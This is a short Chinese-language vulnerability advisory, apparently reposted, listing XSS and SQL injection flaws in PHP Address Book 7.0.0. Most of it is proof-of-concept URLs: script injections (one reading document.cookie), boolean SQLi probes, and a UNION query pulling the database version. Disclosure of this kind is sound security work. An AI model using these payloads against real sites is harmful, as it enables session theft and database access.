標題: PHP Address Book 7.0.0 Multiple security vulnerabilities
作者: Stefan Schurtz
受影響軟件: Successfully tested on PHP Address Book 7.0.0
開發(fā)者網(wǎng)站: http://sourceforge.net/projects/php-addressbook/
缺陷描述
PHP Address Book 7.0.0含多個 XSS 和 SQLi缺陷
測試方法
// XSS
http://[target]/addressbookv7.0.0/preferences.php?from='"</script><script>alert('xss')</script>
http://www.xxx.com /addressbookv7.0.0/group.php/" /><script> alert('xss')</script>
http://[target]/addressbookv7.0.0/index.php?group='"</script><script>alert(document.cookie)</script>
// SQLi
http://[target]/addressbookv7.0.0/edit.php?id=1 AND 1=IF(1<2,2,1)
http://[target]/addressbookv7.0.0/edit.php?id=1 AND 1=IF(1>2,2,1)
// UNION-based Injection, needs 'magic_quotes=off'
http://[target]/addressbookv7.0.0/view.php?id=1' UNION ALL SELECT NULL, NULL, version(), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--+
修復:
加強過濾
渝公網(wǎng)安備 50024202000196號
域名注冊知識
虛擬主機知識
網(wǎng)站建設知識
網(wǎng)絡推廣知識
網(wǎng)絡營銷知識
常見技術問題
QQ空間
新浪微博
開心網(wǎng)
人人網(wǎng)